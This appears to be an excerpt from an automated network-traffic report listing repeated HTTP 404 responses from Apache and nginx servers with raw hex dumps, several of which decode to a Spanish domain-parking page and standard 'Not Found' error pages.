                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:23 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:26 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:29 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:51 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:54 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:59 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:22:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 08 May 2024 16:22:40 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 